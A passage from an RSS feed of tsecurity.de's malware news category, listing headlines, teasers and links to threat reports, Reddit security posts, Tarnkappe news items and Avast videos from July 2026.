     • win.ghost_rat
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3672751/it+sicherheit/malware+trojaner+viren/introducing+cylindricalcanine+the+goldeneyedog+subgroup+responsible+for+the+april+digicert+incident/</link>
<pubDate>Thu, 16 Jul 2026 10:03:24 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-15 • Expel
     • AARON WALTON
     • win.ghost_rat
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/6be7e77b-3a0f-4a94-a624-d5a2012d4b9f/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RPCS3: Emulator kann jetzt über 75 % der PlayStation-3-Games vollständig abspielen]]></title>
<description><![CDATA[Die Entwickler vom RPCS3 berichten, dass ihr PS3-Emulator jetzt über 75% aller existierenden Games dieser Spielkonsole ausführen kann.
Der Artikel RPCS3: Emulator kann jetzt über 75 % der PlayStation-3-Games vollständig abspielen erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3672612/it+sicherheit/malware+trojaner+viren/rpcs3+emulator+kann+jetzt+ueber+75+der+playstation-3-games+vollstaendig+abspielen/</link>
<pubDate>Thu, 16 Jul 2026 09:19:14 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die Entwickler vom RPCS3 berichten, dass ihr PS3-Emulator jetzt über 75% aller existierenden Games dieser Spielkonsole ausführen kann.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gaming/rpcs3-emulator-kann-jetzt-ueber-75-der-playstation-3-games-vollstaendig-abspielen-331513.html">RPCS3: Emulator kann jetzt über 75 % der PlayStation-3-Games vollständig abspielen</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Is Dark AI? How Scammers Are Using Artificial Intelligence Against You]]></title>
<description><![CDATA[Author: Avast - Bewertung: 2x - Views:4 AI isn't just being used for good. Dark AI — artificial intelligence weaponized for malicious purposes — is behind a new wave of scams, phishing attacks, deepfakes, and cybercrimes that are harder than ever to detect.  

Scammers are now using AI to clone v...]]></description>
<link>https://tsecurity.de/de/3671887/it+sicherheit/malware+trojaner+viren/what+is+dark+ai+how+scammers+are+using+artificial+intelligence+against+you/</link>
<pubDate>Wed, 15 Jul 2026 23:18:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 2x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/VfnqOzUzQgg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI isn't just being used for good. Dark AI — artificial intelligence weaponized for malicious purposes — is behind a new wave of scams, phishing attacks, deepfakes, and cybercrimes that are harder than ever to detect.  <br />
<br />
Scammers are now using AI to clone voices, fake video calls, impersonate people you trust, and generate convincing phishing messages at massive scale — all powered by dark GPTs built without safety restrictions.  <br />
<br />
The result? Scams that don't feel technical. They feel personal. <br />
<br />
In this video, you'll learn: <br />
<br />
What Dark AI actually is and how it works <br />
<br />
How AI-powered scams use your routines, writing style, and social posts against you <br />
<br />
The warning signs to watch for — voicemails from your "bank," urgent requests from your "manager," or a family member suddenly needing money <br />
<br />
Simple habits that help you slow down and stay one step ahead <br />
<br />
The smartest defense starts with awareness — and the right tools. Avast One helps detect phishing attempts, flags suspicious links, and blocks fake websites before you interact with them.  <br />
<br />
Download Avast One free today and stay safer online without having to think like a scammer. <br />
<br />
#DarkAI #CyberSecurity #Phishing #Deepfakes #OnlineSafety #AIScams #CyberAwareness #Avast #AvastOne #ScamProtection #DigitalSafety #VoiceCloning #CyberCrime #StaySafeOnline #AIThreats <br />
<br />
Follow us: <br />
<br />
YouTube @Avast <br />
Instagram @avast <br />
Facebook @Avast <br />
TikTok @avast<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Suno: KI-Musikgenerator griff Daten von YouTube, Deezer und Genius ab]]></title>
<description><![CDATA[Das KI-Musiktool Suno hat sich laut einem aktuellen Hack sehr umfangreich bei den verschiedensten Streaming-Plattformen bedient.
Der Artikel Suno: KI-Musikgenerator griff Daten von YouTube, Deezer und Genius ab erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3671542/it+sicherheit/malware+trojaner+viren/suno+ki-musikgenerator+griff+daten+von+youtube+deezer+und+genius+ab/</link>
<pubDate>Wed, 15 Jul 2026 19:48:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Das KI-Musiktool Suno hat sich laut einem aktuellen Hack sehr umfangreich bei den verschiedensten Streaming-Plattformen bedient.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/kuenstliche-intelligenz/suno-ki-musikgenerator-griff-daten-von-youtube-deezer-und-genius-ab-331490.html">Suno: KI-Musikgenerator griff Daten von YouTube, Deezer und Genius ab</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU plant Tempo-Bremse mit Satellitentechnik]]></title>
<description><![CDATA[Die Tempo-Bremse könnte alle Neufahrzeuge überwachen und die Geschwindigkeit zu regulieren. Kritiker halten das für sehr gefährlich.
Der Artikel EU plant Tempo-Bremse mit Satellitentechnik erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3671282/it+sicherheit/malware+trojaner+viren/eu+plant+tempo-bremse+mit+satellitentechnik/</link>
<pubDate>Wed, 15 Jul 2026 18:04:48 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die Tempo-Bremse könnte alle Neufahrzeuge überwachen und die Geschwindigkeit zu regulieren. Kritiker halten das für sehr gefährlich.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/eu-plant-tempo-bremse-mit-satellitentechnik-331485.html">EU plant Tempo-Bremse mit Satellitentechnik</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code]]></title>
<description><![CDATA[submitted by    /u/asherdl02   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3671091/it+sicherheit/malware+trojaner+viren/tuxbot+v3+evolution+an+iot+botnet-as-a-service+framework+built+with+llm-generated+code/</link>
<pubDate>Wed, 15 Jul 2026 17:02:22 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/asherdl02"> /u/asherdl02 </a> <br> <span><a href="https://www.reddit.com/r/Malware/comments/1ux7nmo/tuxbot_v3_evolution_an_iot_botnetasaservice/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ux7o82/tuxbot_v3_evolution_an_iot_botnetasaservice/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[FSB Center 16: How Russian hackers exploit routers via SNMP and Cisco Smart Install]]></title>
<description><![CDATA[2026-07-14 • PICUS Security
     • Sıla Özeren Hacıoğlu
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3671010/it+sicherheit/malware+trojaner+viren/fsb+center+16+how+russian+hackers+exploit+routers+via+snmp+and+cisco+smart+install/</link>
<pubDate>Wed, 15 Jul 2026 16:49:15 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-14 • PICUS Security
     • Sıla Özeren Hacıoğlu
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/24e0100f-da77-4e2c-82df-12ed1d5683f3/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[for the analysts]]></title>
<description><![CDATA[hi, I've been triaging suspicious packages long enough to get tired of stitching the same five tabs together every time something weird shows up in a dependency tree, so I built this to keep it all in one place: https://trail.snappyfeet.org I use it daily and figured I'd share. It's not something...]]></description>
<link>https://tsecurity.de/de/3670603/it+sicherheit/malware+trojaner+viren/for+the+analysts/</link>
<pubDate>Wed, 15 Jul 2026 14:18:47 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>hi,</p> <p>I've been triaging suspicious packages long enough to get tired of stitching the same five tabs together every time something weird shows up in a dependency tree, so I built this to keep it all in one place: <a href="https://trail.snappyfeet.org/">https://trail.snappyfeet.org</a></p> <p>I use it daily and figured I'd share. It's not something that tells you whether something is malicious or not, that's not the philosophy. It rather focuses on raising flags for humans to then take a look into. Feed's live most of the time, I take it down occasionally to update the engine. If there's a package you want to see that isn't in there or would like to understand how the engine works, DM me.</p> <p>Cheers</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Snappyfeet69"> /u/Snappyfeet69 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uwygm3/for_the_analysts/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uwygm3/for_the_analysts/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forgotten UEFI shims undermining Secure Boot]]></title>
<description><![CDATA[ESET researchers discovered 11 vulnerable UEFI shim bootloaders signed by Microsoft that allow attackers to bypass UEFI Secure Boot by exploiting decade-old vulnerabilities]]></description>
<link>https://tsecurity.de/de/3670240/it+sicherheit/malware+trojaner+viren/forgotten+uefi+shims+undermining+secure+boot/</link>
<pubDate>Wed, 15 Jul 2026 12:03:52 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers discovered 11 vulnerable UEFI shim bootloaders signed by Microsoft that allow attackers to bypass UEFI Secure Boot by exploiting decade-old vulnerabilities]]></content:encoded>
</item>
<item>
<title><![CDATA[Piraterie-Links zu All-you-can-Eat-Portalen im Juli 2026]]></title>
<description><![CDATA[Hier die aktuellen Piraterie-Links zu Portalen, wo viele Warez verfügbar sind. Also E-Books, Games, Grafiken, Hörbücher, Filme u.v.m.
Der Artikel Piraterie-Links zu All-you-can-Eat-Portalen im Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3670207/it+sicherheit/malware+trojaner+viren/piraterie-links+zu+all-you-can-eat-portalen+im+juli+2026/</link>
<pubDate>Wed, 15 Jul 2026 11:48:54 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hier die aktuellen Piraterie-Links zu Portalen, wo viele Warez verfügbar sind. Also E-Books, Games, Grafiken, Hörbücher, Filme u.v.m.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/piraterie-links-zu-all-you-can-eat-portalen-im-juli-2026-331457.html">Piraterie-Links zu All-you-can-Eat-Portalen im Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram: Angeblich stehen 182 Millionen Nutzer-Datensätze zum Verkauf]]></title>
<description><![CDATA[Ein Hacker verkauft in Untergrund-Foren eine Textdatei mit Nutzer-Datensätzen des Messengers Telegram. Das Passwort ist aber nicht dabei.
Der Artikel Telegram: Angeblich stehen 182 Millionen Nutzer-Datensätze zum Verkauf erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3669559/it+sicherheit/malware+trojaner+viren/telegram+angeblich+stehen+182+millionen+nutzer-datensaetze+zum+verkauf/</link>
<pubDate>Wed, 15 Jul 2026 06:33:25 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ein Hacker verkauft in Untergrund-Foren eine Textdatei mit Nutzer-Datensätzen des Messengers Telegram. Das Passwort ist aber nicht dabei.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/cyberangriffe/telegram-angeblich-stehen-182-millionen-nutzer-datensaetze-zum-verkauf-331452.html">Telegram: Angeblich stehen 182 Millionen Nutzer-Datensätze zum Verkauf</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The New Avast One]]></title>
<description><![CDATA[Author: Avast - Bewertung: 0x - Views:4 Scam protection, antivirus, VPN, and privacy tools — all in one app 🔐 Check out the new Avast One: https://bit.ly/4bK70M3]]></description>
<link>https://tsecurity.de/de/3668954/it+sicherheit/malware+trojaner+viren/the+new+avast+one/</link>
<pubDate>Tue, 14 Jul 2026 21:03:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/JD0T0DStizQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Scam protection, antivirus, VPN, and privacy tools — all in one app 🔐 Check out the new Avast One: https://bit.ly/4bK70M3<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Writing an Evasive .NET Shellcode Loader]]></title>
<description><![CDATA[submitted by    /u/slashcrypto   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3668659/it+sicherheit/malware+trojaner+viren/writing+an+evasive+net+shellcode+loader/</link>
<pubDate>Tue, 14 Jul 2026 18:26:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/slashcrypto"> /u/slashcrypto </a> <br> <span><a href="https://slashsec.at/en/blog/writing-an-evasive-dotnet-shellcode-loader">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uw1in9/writing_an_evasive_net_shellcode_loader/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nightmare Eclipse could be dropping his big promised exploit today]]></title>
<description><![CDATA[submitted by    /u/ILikeNoodlesXOXO   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3668658/it+sicherheit/malware+trojaner+viren/nightmare+eclipse+could+be+dropping+his+big+promised+exploit+today/</link>
<pubDate>Tue, 14 Jul 2026 18:26:09 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ILikeNoodlesXOXO"> /u/ILikeNoodlesXOXO </a> <br> <span><a href="https://www.reddit.com/r/cybersecurity/comments/1uw2f7e/nightmare_eclipse_could_be_dropping_his_big/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uw2ye9/nightmare_eclipse_could_be_dropping_his_big/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[ExpressVPN: FIFA gerät wegen WM-Sponsor unter Beschuss]]></title>
<description><![CDATA[FIFA gerät wegen wegen des WM-Sponsors ExpressVPN massiv in die Kritik. La Liga spricht von einem fatalen Signal.
Der Artikel ExpressVPN: FIFA gerät wegen WM-Sponsor unter Beschuss erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3668378/it+sicherheit/malware+trojaner+viren/expressvpn+fifa+geraet+wegen+wm-sponsor+unter+beschuss/</link>
<pubDate>Tue, 14 Jul 2026 16:50:18 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FIFA gerät wegen wegen des WM-Sponsors ExpressVPN massiv in die Kritik. La Liga spricht von einem fatalen Signal.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/expressvpn-fifa-wm-sponsor-kritik-331431.html">ExpressVPN: FIFA gerät wegen WM-Sponsor unter Beschuss</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram büßt Kurzlink-Domain t.me ein]]></title>
<description><![CDATA[Verwirrung der Nutzung von Telegram. Die Kurzlink-Domain t.me funktioniert seit gestern nicht mehr. Langsam werden die Ursachen geklärt.
Der Artikel Telegram büßt Kurzlink-Domain t.me ein erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3667763/it+sicherheit/malware+trojaner+viren/telegram+buesst+kurzlink-domain+tme+ein/</link>
<pubDate>Tue, 14 Jul 2026 13:32:24 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Verwirrung der Nutzung von Telegram. Die Kurzlink-Domain t.me funktioniert seit gestern nicht mehr. Langsam werden die Ursachen geklärt.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/rechtssachen/telegram-buesst-kurzlink-domain-ein-331432.html">Telegram büßt Kurzlink-Domain t.me ein</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[QuickNote] SolidPDFCreator – Mustang Panda Stage-1 Backdoor (Target India)]]></title>
<description><![CDATA[2026-07-13 • kienmanowar Blog
     • m4n0w4r, Tran Trung Kien
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3667387/it+sicherheit/malware+trojaner+viren/quicknote+solidpdfcreator+-+mustang+panda+stage-1+backdoor+target+india/</link>
<pubDate>Tue, 14 Jul 2026 11:03:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-13 • kienmanowar Blog
     • m4n0w4r, Tran Trung Kien
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/16c02ffa-6c8b-490a-a291-535d790772b9/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MalwareBazaar | SHA256 13543ef85a0988a09ef430a1f114f920a670a82f9e360ff9e6872252062d4768 (RevStealer)]]></title>
<description><![CDATA[2026-07-13 • abuse.ch
     • abuse.ch
     • win.revstealer
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3667386/it+sicherheit/malware+trojaner+viren/malwarebazaar+sha256+13543ef85a0988a09ef430a1f114f920a670a82f9e360ff9e6872252062d4768+revstealer/</link>
<pubDate>Tue, 14 Jul 2026 11:03:28 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-13 • abuse.ch
     • abuse.ch
     • win.revstealer
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/23a0adbd-14d5-418b-856a-e8d557796743/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sport-Streaming-Seiten: Iran macht bei Beschlagnahmungen von Domains nicht mit]]></title>
<description><![CDATA[Die USA gehen aktuell mit Beschlagnahmungen gegen Sport-Streaming-Seiten vor. Doch die Ausweichdomains im Iran sind alle noch verfügbar.
Der Artikel Sport-Streaming-Seiten: Iran macht bei Beschlagnahmungen von Domains nicht mit erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3667099/it+sicherheit/malware+trojaner+viren/sport-streaming-seiten+iran+macht+bei+beschlagnahmungen+von+domains+nicht+mit/</link>
<pubDate>Tue, 14 Jul 2026 09:03:35 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die USA gehen aktuell mit Beschlagnahmungen gegen Sport-Streaming-Seiten vor. Doch die Ausweichdomains im Iran sind alle noch verfügbar.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/rechtssachen/sport-streaming-seiten-iran-macht-bei-beschlagnahmungen-von-domains-nicht-mit-331420.html">Sport-Streaming-Seiten: Iran macht bei Beschlagnahmungen von Domains nicht mit</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Syscall monitor]]></title>
<description><![CDATA[I would like to share my Linux Syscall Monitor project with you. It's a Linux process monitoring tool written in C that uses "ptrace" to observe system calls and generate behavioral reports. I welcome any feedback or criticism—whether it's about the code .repo    submitted by    /u/cdtrmnbaell   ...]]></description>
<link>https://tsecurity.de/de/3666713/it+sicherheit/malware+trojaner+viren/syscall+monitor/</link>
<pubDate>Tue, 14 Jul 2026 04:18:07 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I would like to share my Linux Syscall Monitor project with you. It's a Linux process monitoring tool written in C that uses "ptrace" to observe system calls and generate behavioral reports.</p> <p>I welcome any feedback or criticism—whether it's about the code .<a href="https://github.com/tracebyte8/linux-syscall-monitor">repo</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/cdtrmnbaell"> /u/cdtrmnbaell </a> <br> <span><a href="https://github.com/tracebyte8/linux-syscall-monitor">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uvtnio/syscall_monitor/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[KytyPS5: PS5-Emulator für Windows mit Leistungsupdate]]></title>
<description><![CDATA[Ein Update mit merklich mehr Leistung. Es lohnt sich jetzt, die neue Version des Emulators KytyPS5 auszuprobieren.
Der Artikel KytyPS5: PS5-Emulator für Windows mit Leistungsupdate erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3665286/it+sicherheit/malware+trojaner+viren/kytyps5+ps5-emulator+fuer+windows+mit+leistungsupdate/</link>
<pubDate>Mon, 13 Jul 2026 14:47:59 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ein Update mit merklich mehr Leistung. Es lohnt sich jetzt, die neue Version des Emulators KytyPS5 auszuprobieren.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gaming/kytyps5-ps5-emulator-fuer-windows-mit-leistungsupdate-331411.html">KytyPS5: PS5-Emulator für Windows mit Leistungsupdate</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One Email Closer to the Edge: UNK_MassTraction & the Physics of Exploitation]]></title>
<description><![CDATA[2026-07-07 • Proofpoint
     • Greg Lesnewich, Mark Kelly, Proofpoint Threat Research Team
     • js.icecube
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3664818/it+sicherheit/malware+trojaner+viren/one+email+closer+to+the+edge+unkmasstraction+the+physics+of+exploitation/</link>
<pubDate>Mon, 13 Jul 2026 11:48:58 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-07 • Proofpoint
     • Greg Lesnewich, Mark Kelly, Proofpoint Threat Research Team
     • js.icecube
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/e498402e-a08c-402e-88a6-fcb63f8f34d4/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[UAT-7810 continues building ORB networks using new malware]]></title>
<description><![CDATA[2026-07-07 • Cisco Talos
     • Asheer Malhotra, Brandon White, Jungsoo An, Vanja Svajcer
     • elf.dogleash, jar.jarleash
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3664645/it+sicherheit/malware+trojaner+viren/uat-7810+continues+building+orb+networks+using+new+malware/</link>
<pubDate>Mon, 13 Jul 2026 10:33:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-07 • Cisco Talos
     • Asheer Malhotra, Brandon White, Jungsoo An, Vanja Svajcer
     • elf.dogleash, jar.jarleash
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/dcb60819-1051-4a35-833b-f7009dd5d2a4/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TechnitiumDNS App bringt Technitium aufs Smartphone]]></title>
<description><![CDATA[TechnitiumDNS App und Technito verwalten Technitium DNS auf Android und iOS. Dazu kommen Tailscale Funnel und der eigene Resolver.
Der Artikel TechnitiumDNS App bringt Technitium aufs Smartphone erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3664472/it+sicherheit/malware+trojaner+viren/technitiumdns+app+bringt+technitium+aufs+smartphone/</link>
<pubDate>Mon, 13 Jul 2026 09:02:59 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TechnitiumDNS App und Technito verwalten Technitium DNS auf Android und iOS. Dazu kommen Tailscale Funnel und der eigene Resolver.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/technitiumdns-app-bringt-technitium-aufs-smartphone-331395.html">TechnitiumDNS App bringt Technitium aufs Smartphone</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Analysis of Ongoing Ousaban Attacks Targeting the Iberian Peninsula]]></title>
<description><![CDATA[2026-07-01 • Fortinet
     • Rachael Liao
     • win.ousaban
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3664441/it+sicherheit/malware+trojaner+viren/analysis+of+ongoing+ousaban+attacks+targeting+the+iberian+peninsula/</link>
<pubDate>Mon, 13 Jul 2026 08:46:50 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-01 • Fortinet
     • Rachael Liao
     • win.ousaban
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/9d1e9c2e-0867-4157-8be7-cb3ebce10355/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AntiVE-BehaviorWatch ( AI model Inside a EXE )]]></title>
<description><![CDATA[submitted by    /u/ObligationLucky842   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3664065/it+sicherheit/malware+trojaner+viren/antive-behaviorwatch+ai+model+inside+a+exe/</link>
<pubDate>Mon, 13 Jul 2026 04:18:17 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ObligationLucky842"> /u/ObligationLucky842 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uug6q5/antivebehaviorwatch_ai_model_inside_a_exe/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uug8dm/antivebehaviorwatch_ai_model_inside_a_exe/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[SharpEmu kann erste PS5-Spiele emulieren]]></title>
<description><![CDATA[SharpEmu ist ein neuer PS5-Emulator, der sich aber noch in einem recht frühen Entwicklungsstadium befindet. Erste Spiele laufen bereits.
Der Artikel SharpEmu kann erste PS5-Spiele emulieren erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3663618/it+sicherheit/malware+trojaner+viren/sharpemu+kann+erste+ps5-spiele+emulieren/</link>
<pubDate>Sun, 12 Jul 2026 18:48:20 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SharpEmu ist ein neuer PS5-Emulator, der sich aber noch in einem recht frühen Entwicklungsstadium befindet. Erste Spiele laufen bereits.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gaming/sharpemu-kann-erste-ps5-spiele-emulieren-331353.html">SharpEmu kann erste PS5-Spiele emulieren</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tangem Sicherheitslücke: Laser-Angriff hebelt Hardware-Wallet dauerhaft aus]]></title>
<description><![CDATA[Tangem Sicherheitslücke entdeckt: Ein Laser-Angriff kann Wallet-Passwörter umgehen. Keine Updates möglich, Risiko bei physischem Zugriff.
Der Artikel Tangem Sicherheitslücke: Laser-Angriff hebelt Hardware-Wallet dauerhaft aus erschien zuerst auf TARNKAPPE.INFO]]></description>
